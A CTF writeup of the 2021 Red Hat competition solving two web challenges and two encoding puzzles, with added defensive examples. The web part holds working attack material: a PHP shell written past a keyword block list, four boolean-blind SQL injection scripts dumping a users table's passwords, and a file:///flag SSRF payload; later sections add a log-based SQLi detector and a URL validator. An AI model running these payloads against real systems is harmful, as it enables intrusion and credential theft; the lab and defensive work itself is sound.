Preface

Competition URL: https://race.ichunqiu.com/2021redhat

web

find_it

The environment is gone... so I can only describe the approach.

At the start there was just one page and nothing else.

robots.txt hints at 1ndexx.php, but visiting it returns a 500....

Only later did I learn it's a guess-the-trick challenge: you have to request .1ndexx.php.swp

That yields the source:

<?php
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
echo '<br>';

$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
    die("you die");
}
if(strlen($a)>33){
    die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

Not sure what the author intended here, but it's obvious you can write a shell with it.

?code=<?php phpinfo();?>

hack.php then shows the phpinfo page, and the flag is in the environment variables.

WebsiteManger

A challenge very similar to [CISCN2019 总决赛 Day2 Web1]Easyweb; even the UI is identical... I did that one before: [link]([CISCN2019 总决赛 Day2 Web1]Easyweb)

The image on the login form is loaded by passing the parameter id=

Testing the SQL injection showed that spaces, union and limit are filtered... so I just tweaked the old exp and let it run.

Dumping the database name

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
# Boolean condition on the count-th character of the concatenated schema names;
# /**/ stands in for the filtered space and # truncates the rest of the query.
payload="?id=if((select/**/ascii(substr(group_concat(schema_name),{},1))/**/from/**/information_schema.schemata)>{},1,0)#"
database=""
for count in range(64):
    # Binary search over the printable ASCII range for one character
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            database+=chr(high)
            print(database)
            break
        if("JFIF" in r.text):
            # A JPEG came back: the condition held, so the character is above now
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(database)

Got the database name; I guessed the credentials are in ctf.

Dumping the table names

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(table_name),{},1))/**/from/**/information_schema.tables/**/where/**/table_schema='ctf')>{},1,0)#"
table=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            table+=chr(high)
            print(table)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(table)

Got the tables image and users; the credentials should be in users.

Dumping the columns

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(column_name),{},1))/**/from/**/information_schema.columns/**/where/**/table_name='users')>{},1,0)#"
column=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            column+=chr(high)
            print(column)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(column)

Got username and password.

Dumping the data

import requests
url="http://1e3c0112-ddf3-4523-8d9b-c8511d39b3f2.node3.buuoj.cn/image.php"
payload="?id=if((select/**/ascii(substr(group_concat(password),{},1))/**/from/**/ctf.users)>{},1,0)#"
word=""
for count in range(64):
    low=40
    high=124
    now=64
    while True:
        r=requests.get(url+payload.format(count+1,now))
        if(high-low<2):
            word+=chr(high)
            print(word)
            break
        if("JFIF" in r.text):
            low=now
            now=int((low+high)/2)
            continue
        else:
            high=now
            now=int((low+high)/2)
            continue
print(word)

Got the account admin and a long password I've since forgotten.

After logging in there's an input box that offers to test whether a site is up using curl...

So consider reading a file through a pseudo-protocol (URL scheme).

payload

file:///flag

And that gives the flag.
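The four dump loops above all leave the same trace on the server: one client hammering image.php with requests whose id parameter carries inline comments, information_schema and ascii(substr(...)), and whose responses flip between two sizes (the JFIF image or not). As an added example, not part of the original writeup, here is a small log-triage script that picks that pattern out of access-log lines. The log lines, client addresses and thresholds are constructed for the demonstration.

```python
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import unquote

# Constructed sample access-log lines in combined format (not taken from the
# challenge server). The first host probes image.php with the inline-comment
# boolean payload shape used above; the second host browses normally.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2021:12:00:01 +0800] "GET /image.php?id=1 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2021:12:00:02 +0800] "GET /image.php?id=if((select/**/ascii(substr(group_concat(schema_name),1,1))/**/from/**/information_schema.schemata)>64,1,0)%23 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2021:12:00:02 +0800] "GET /image.php?id=if((select/**/ascii(substr(group_concat(schema_name),1,1))/**/from/**/information_schema.schemata)>94,1,0)%23 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2021:12:00:03 +0800] "GET /image.php?id=if((select/**/ascii(substr(group_concat(schema_name),1,1))/**/from/**/information_schema.schemata)>109,1,0)%23 HTTP/1.1" 200 40
203.0.113.7 - - [10/Jan/2021:12:00:03 +0800] "GET /image.php?id=if((select/**/ascii(substr(group_concat(schema_name),1,1))/**/from/**/information_schema.schemata)>101,1,0)%23 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Jan/2021:12:00:04 +0800] "GET /image.php?id=if((select%2F%2A%2A%2Fascii(substr(group_concat(schema_name),1,1))%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.schemata)>105,1,0)%23 HTTP/1.1" 200 40
198.51.100.4 - - [10/Jan/2021:12:00:05 +0800] "GET /image.php?id=2 HTTP/1.1" 200 6011
198.51.100.4 - - [10/Jan/2021:12:00:06 +0800] "GET /index.php HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each marker is one ingredient of the boolean-blind technique seen above.
MARKERS = {
    "inline_comment": re.compile(r"/\*.*?\*/"),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "char_extraction": re.compile(r"\b(?:ascii|ord|substr|substring|mid)\s*\(", re.I),
    "conditional_subselect": re.compile(r"\bif\s*\(\s*\(?\s*select\b", re.I),
}


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line; percent-decode the URI before matching."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["uri"] = unquote(rec["uri"])
    rec["path"] = rec["uri"].split("?", 1)[0]
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec


def sqli_markers(uri: str) -> set:
    """Names of the injection markers present in a decoded URI."""
    return {name for name, rx in MARKERS.items() if rx.search(uri)}


def find_blind_sqli(lines, min_markers: int = 2, min_requests: int = 3):
    """Group marker-laden requests per (client, path) and flag repeating groups.

    A boolean-blind dump needs several near-identical requests per character,
    so one marker on one request is noise; a burst of them against one endpoint
    from one client is the signal. The set of response sizes is reported too,
    because a two-valued size is the oracle the attacker reads."""
    groups = defaultdict(lambda: {"count": 0, "markers": set(), "sizes": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = sqli_markers(rec["uri"])
        if len(hits) < min_markers:
            continue
        g = groups[(rec["ip"], rec["path"])]
        g["count"] += 1
        g["markers"] |= hits
        g["sizes"].add(rec["size"])
    findings = [{"ip": ip, "path": path, **g}
                for (ip, path), g in groups.items() if g["count"] >= min_requests]
    return sorted(findings, key=lambda f: -f["count"])


if __name__ == "__main__":
    for f in find_blind_sqli(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']} -> {f['path']}: {f['count']} requests, "
              f"markers={sorted(f['markers'])}, sizes={sorted(f['sizes'])}")
```

Run over a real access log, the thresholds need tuning to the site's normal traffic; the marker set is deliberately narrow (comment-as-space, metadata tables, per-character extraction, conditional subselect) so that a single false positive on a search box does not page anyone, while a dump like the one above produces dozens of hits per minute.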
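The "check whether a site is alive with curl" feature fails here because the server hands a user-supplied URL to a fetcher that accepts any scheme, so file:///flag reads a local file. As an added example, not the challenge's code, here is the validation an outbound fetcher should run before touching a user-supplied URL: an allowlist of schemes, no embedded credentials, and a check that the host resolves to a public address. The DNS table and the fake_resolve helper are constructed so the block runs offline.

```python
import ipaddress
import socket
from typing import Callable, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS so the example runs offline; hostnames not in the
# table resolve to themselves, so IP literals pass straight through.
FAKE_DNS = {"example.com": "93.184.216.34", "intranet.local": "10.0.0.5"}


def fake_resolve(host: str) -> str:
    return FAKE_DNS.get(host, host)


def is_public_address(addr: str) -> bool:
    """Reject loopback, RFC1918, link-local (cloud metadata), multicast, reserved."""
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_target(url: str,
                    resolve: Callable[[str], str] = socket.gethostbyname) -> Tuple[bool, str]:
    """Decide whether a user-supplied URL may be handed to an outbound fetcher.

    Returns (allowed, reason) on rejection or (True, resolved_ip) on success, so
    the caller can connect to the address that was actually checked."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # file:// and every other non-HTTP scheme the fetcher may know is refused here
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    try:
        addr = resolve(host)
        public = is_public_address(addr)
    except (OSError, ValueError) as exc:
        return False, f"could not resolve {host}: {exc}"
    if not public:
        return False, f"{host} resolves to non-public address {addr}"
    return True, addr


if __name__ == "__main__":
    for candidate in ("file:///flag", "http://127.0.0.1/", "http://intranet.local/",
                      "http://example.com/status"):
        print(candidate, "->", validate_target(candidate, fake_resolve))
```

Two caveats belong with this check: the fetch must connect to the address returned by validate_target (with the Host header set to the original name) rather than resolving the name a second time, otherwise a DNS answer that changes between check and use defeats it; and if the fetcher follows redirects, each redirect target has to go through the same validation.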

misc

Sign-in

The download contains just one file, EBCDIC.txt, which is gibberish when opened.

The filename tells us the content is EBCDIC-encoded and needs converting, so we grab a script from the internet.

#include <stdio.h>

#ifndef A2E__H
#define A2E__H
unsigned char ASCIItoEBCDIC(const unsigned char c); /* A2E.C */
unsigned char EBCDICtoASCII(const unsigned char c); /* A2E.C */
extern int ascii2ebcdic[256]; /* Toascii.C */
extern int ebcdic2ascii[256]; /* Toascii.C */
#endif /* A2E__H */

/* ASCII -> EBCDIC lookup table (index: ASCII byte, value: EBCDIC byte) */
static unsigned char a2e[256] = {
    0, 1, 2, 3, 55, 45, 46, 47, 22, 5, 37, 11, 12, 13, 14, 15,
    16, 17, 18, 19, 60, 61, 50, 38, 24, 25, 63, 39, 28, 29, 30, 31,
    64, 79,127,123, 91,108, 80,125, 77, 93, 92, 78,107, 96, 75, 97,
    240,241,242,243,244,245,246,247,248,249,122, 94, 76,126,110,111,
    124,193,194,195,196,197,198,199,200,201,209,210,211,212,213,214,
    215,216,217,226,227,228,229,230,231,232,233, 74,224, 90, 95,109,
    121,129,130,131,132,133,134,135,136,137,145,146,147,148,149,150,
    151,152,153,162,163,164,165,166,167,168,169,192,106,208,161, 7,
    32, 33, 34, 35, 36, 21, 6, 23, 40, 41, 42, 43, 44, 9, 10, 27,
    48, 49, 26, 51, 52, 53, 54, 8, 56, 57, 58, 59, 4, 20, 62,225,
    65, 66, 67, 68, 69, 70, 71, 72, 73, 81, 82, 83, 84, 85, 86, 87,
    88, 89, 98, 99,100,101,102,103,104,105,112,113,114,115,116,117,
    118,119,120,128,138,139,140,141,142,143,144,154,155,156,157,158,
    159,160,170,171,172,173,174,175,176,177,178,179,180,181,182,183,
    184,185,186,187,188,189,190,191,202,203,204,205,206,207,218,219,
    220,221,222,223,234,235,236,237,238,239,250,251,252,253,254,255
};

/* EBCDIC -> ASCII lookup table (index: EBCDIC byte, value: ASCII byte) */
static unsigned char e2a[256] = {
    0, 1, 2, 3,156, 9,134,127,151,141,142, 11, 12, 13, 14, 15,
    16, 17, 18, 19,157,133, 8,135, 24, 25,146,143, 28, 29, 30, 31,
    128,129,130,131,132, 10, 23, 27,136,137,138,139,140, 5, 6, 7,
    144,145, 22,147,148,149,150, 4,152,153,154,155, 20, 21,158, 26,
    32,160,161,162,163,164,165,166,167,168, 91, 46, 60, 40, 43, 33,
    38,169,170,171,172,173,174,175,176,177, 93, 36, 42, 41, 59, 94,
    45, 47,178,179,180,181,182,183,184,185,124, 44, 37, 95, 62, 63,
    186,187,188,189,190,191,192,193,194, 96, 58, 35, 64, 39, 61, 34,
    195, 97, 98, 99,100,101,102,103,104,105,196,197,198,199,200,201,
    202,106,107,108,109,110,111,112,113,114,203,204,205,206,207,208,
    209,126,115,116,117,118,119,120,121,122,210,211,212,213,214,215,
    216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,
    123, 65, 66, 67, 68, 69, 70, 71, 72, 73,232,233,234,235,236,237,
    125, 74, 75, 76, 77, 78, 79, 80, 81, 82,238,239,240,241,242,243,
    92,159, 83, 84, 85, 86, 87, 88, 89, 90,244,245,246,247,248,249,
    48, 49, 50, 51, 52, 53, 54, 55, 56, 57,250,251,252,253,254,255
};

unsigned char ASCIItoEBCDIC(const unsigned char c)
{
    return a2e[c];
}

unsigned char EBCDICtoASCII(const unsigned char c)
{
    return e2a[c];
}

int main(int argc, char* argv[])
{
    FILE *fp, *fp1;
    unsigned char getbuffer[20];
    unsigned char ascch[20];

    /* Input and output paths as used by the author; adjust to your own files */
    fp = fopen("F:\\360download\\EBCDIC\\EBCDIC.txt", "rb");
    if (fp != NULL)
    {
        fp1 = fopen("F:\\360download\\EBCDIC\\out.txt", "w");
        if (fp1 != NULL)
        {
            /* Translate the file one byte at a time through the e2a table */
            while (fread(getbuffer, 1, 1, fp) != 0)
            {
                ascch[0] = EBCDICtoASCII(getbuffer[0]);
                fwrite(ascch, 1, 1, fp1);
            }
            fclose(fp1);
        }
        /* Closed inside the check: fclose(NULL) is undefined behaviour */
        fclose(fp);
    }
    return 0;
}

Run the script and out comes the flag.

flag{we1c0me_t0_redhat2021}
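The lookup table in the C program above is the classic EBCDIC-to-ASCII mapping; Python ships the same mappings as codecs (cp037, cp500, cp1140), and the letters, digits, space, underscore and braces that make up a flag agree across them. As an added example, not the writeup's script, the block below shows how to recognise EBCDIC text from its byte distribution before guessing at the encoding, and how to decode it with the built-in codecs. The sample bytes are a constructed EBCDIC "Hello World", not the challenge file.

```python
# EBCDIC byte ranges that carry letters, digits and the space character; the
# common EBCDIC code pages agree on these (punctuation slots differ between them).
_EBCDIC_TEXT = (
    {0x40}                                                                        # space
    | set(range(0x81, 0x8A)) | set(range(0x91, 0x9A)) | set(range(0xA2, 0xAA))  # a-z
    | set(range(0xC1, 0xCA)) | set(range(0xD1, 0xDA)) | set(range(0xE2, 0xEA))  # A-Z
    | set(range(0xF0, 0xFA))                                                      # 0-9
)
_ASCII_TEXT = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

# Constructed sample: "Hello World" encoded in EBCDIC (not the challenge file).
SAMPLE_EBCDIC = b"\xc8\x85\x93\x93\x96\x40\xe6\x96\x99\x93\x84"


def text_ratio(data: bytes, alphabet: set) -> float:
    """Fraction of bytes that fall inside the given text alphabet."""
    return sum(b in alphabet for b in data) / len(data) if data else 0.0


def looks_like_ebcdic(data: bytes) -> bool:
    """True when the bytes read better as EBCDIC text than as ASCII text.

    ASCII letters (0x41-0x7A) land on EBCDIC control and punctuation slots, while
    EBCDIC letters all sit at 0x81 and above where ASCII has nothing printable,
    so the two ratios separate cleanly on real text."""
    return text_ratio(data, _EBCDIC_TEXT) > text_ratio(data, _ASCII_TEXT)


def decode_ebcdic(data: bytes, codepage: str = "cp500") -> str:
    """Decode with Python's built-in EBCDIC codec (default: EBCDIC International)."""
    return data.decode(codepage)


def decode_candidates(data: bytes, codepages=("cp037", "cp500", "cp1140")) -> dict:
    """Decode under several EBCDIC code pages. Letters and digits agree; a handful
    of punctuation slots differ, so compare the variants if the text looks off."""
    return {cp: data.decode(cp, errors="replace") for cp in codepages}


if __name__ == "__main__":
    print("EBCDIC?", looks_like_ebcdic(SAMPLE_EBCDIC))
    for cp, text in decode_candidates(SAMPLE_EBCDIC).items():
        print(cp, repr(text))
```

For a whole file, `looks_like_ebcdic(open("EBCDIC.txt", "rb").read())` answers the "is this really EBCDIC or just corrupted?" question before any table is applied, and `decode_ebcdic` replaces the C program for the conversion itself.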

colorful code

Two files, data1 and data2.

At a glance data2 looked like a gif... but I couldn't repair it and gave up in frustration....

After finishing the web challenges I came back for a closer look and noticed a pattern.

The numbers in data1 are all between 0 and 19.

In data2, after the first sixty groups everything repeats in identical sets of three; is that hinting that the first 60 numbers should be read three at a time?

exp

a='00 00 00 00 00 C0 00 FF FF 00 FF 00 FF C0 FF FF C0 C0 C0 C0 FF C0 C0 00 FF 00 FF FF 00 00 C0 00 00 C0 00 C0 FF FF FF FF FF 00 FF FF C0 00 C0 00 00 C0 C0 C0 FF FF C0 FF C0 00 00 FF'
b=a.split(' ')
f=open('output.txt','w')
for i in range(int(len(b)/3)):
    f.write("{} {} {}\n".format(int(b[3*i],16),int(b[3*i+1],16),int(b[3*i+2],16)))
f.close()

Result:

0 0 0
0 0 192
0 255 255
0 255 0
255 192 255
255 192 192
192 192 255
192 192 0
255 0 255
255 0 0
192 0 0
192 0 192
255 255 255
255 255 0
255 255 192
0 192 0
0 192 192
192 255 255
192 255 192
0 0 255

Then work out the image dimensions.

with open('1.txt') as f:
    a=f.read().split(' ')
    print(len(a)-1)

There are 7067 groups of numbers; factor that online.

Then draw it with PIL.

from PIL import Image
im = Image.new("RGB",(37,191),(255,255,255))
a='00 00 00 00 00 C0 00 FF FF 00 FF 00 FF C0 FF FF C0 C0 C0 C0 FF C0 C0 00 FF 00 FF FF 00 00 C0 00 00 C0 00 C0 FF FF FF FF FF 00 FF FF C0 00 C0 00 00 C0 C0 C0 FF FF C0 FF C0 00 00 FF'
b=a.split(' ')
with open('data1') as f:
    data1=f.read().split(' ')
    # each data1 value is a palette index; the stream runs down each column of 191 pixels
    for i in range(37):
        for j in range(191):
            k=int(data1[i*191+j])
            im.putpixel((i, j), (int(b[3*k],16),int(b[3*k+1],16),int(b[3*k+2],16)))
im.save('output.png')

That gives an image.

It's Piet; throw it at the online interpreter https://www.bertnase.de/npiet/npiet-execute.php

And the flag comes out.

flag{88842f20-fb8c-45c9-ae8f-36135b6a0f11}
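The three scripts above do one job in pieces: split the first 60 values of data2 into a 20-colour palette, factor the pixel count to get the dimensions, then map each data1 index onto a pixel. As an added example that is not the writeup's code, the block below does the same in one place without PIL, validates the index stream against the palette instead of crashing mid-image, and writes a plain PPM that any image viewer or converter opens. The palette string is the one quoted above; SAMPLE_INDICES is a constructed 3x2 stand-in for data1, and the column_major flag reproduces the writeup's layout where the index stream runs down each column.

```python
from typing import List, Sequence, Tuple

Color = Tuple[int, ...]

# The 60 palette values from data2 as quoted in the writeup: 3 channels per colour.
PALETTE_HEX = ("00 00 00 00 00 C0 00 FF FF 00 FF 00 FF C0 FF FF C0 C0 C0 C0 FF C0 C0 00 "
               "FF 00 FF FF 00 00 C0 00 00 C0 00 C0 FF FF FF FF FF 00 FF FF C0 00 C0 00 "
               "00 C0 C0 C0 FF FF C0 FF C0 00 00 FF")

# Constructed 3x2 stand-in for data1 (the real file holds 7067 indices in 0..19).
SAMPLE_INDICES = "0 1 2 3 12 19"


def parse_palette(hex_text: str, channels: int = 3) -> List[Color]:
    """Hex tokens -> list of colour tuples, one per `channels` values."""
    vals = [int(tok, 16) for tok in hex_text.split()]
    if len(vals) % channels:
        raise ValueError(f"{len(vals)} values is not a multiple of {channels} channels")
    return [tuple(vals[i:i + channels]) for i in range(0, len(vals), channels)]


def candidate_dimensions(n: int) -> List[Tuple[int, int]]:
    """Every (w, h) with w*h == n and w <= h: the 'factor it online' step."""
    return [(w, n // w) for w in range(1, int(n ** 0.5) + 1) if n % w == 0]


def render(indices: Sequence[int], palette: Sequence[Color], width: int, height: int,
           column_major: bool = False) -> List[List[Color]]:
    """Map palette indices onto a width x height grid, returned as rows of colours.

    column_major=True follows the writeup: the stream fills x=0 for all y, then x=1, ...
    Length and range are checked up front so a bad guess at the dimensions or a
    corrupted index fails with a message instead of an IndexError halfway through."""
    if len(indices) != width * height:
        raise ValueError(f"{len(indices)} indices do not fill {width}x{height}")
    bad = sorted({k for k in indices if not 0 <= k < len(palette)})
    if bad:
        raise ValueError(f"indices outside palette of {len(palette)} colours: {bad[:5]}")

    def at(x: int, y: int) -> int:
        return indices[x * height + y] if column_major else indices[y * width + x]

    return [[palette[at(x, y)] for x in range(width)] for y in range(height)]


def to_ppm(grid: List[List[Color]]) -> bytes:
    """Binary PPM (P6): header plus raw RGB bytes, readable without PIL."""
    height, width = len(grid), len(grid[0])
    header = f"P6 {width} {height} 255\n".encode()
    body = bytes(c for row in grid for px in row for c in px)
    return header + body


def decode(indices_text: str, palette_hex: str, width: int, height: int,
           column_major: bool = False) -> bytes:
    """Whole pipeline: text index stream + hex palette -> PPM image bytes."""
    indices = [int(t) for t in indices_text.split()]
    return to_ppm(render(indices, parse_palette(palette_hex), width, height, column_major))


if __name__ == "__main__":
    print("dimension candidates for 7067 pixels:", candidate_dimensions(7067))
    with open("output.ppm", "wb") as f:
        f.write(decode(SAMPLE_INDICES, PALETTE_HEX, 3, 2, column_major=True))
```

With the real files the call is `decode(open("data1").read(), PALETTE_HEX, 37, 191, column_major=True)`; if the guess at width and height is wrong, the length check says so immediately rather than producing a garbled picture that has to be eyeballed.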

Afterword

Just a record of how much I still suck...
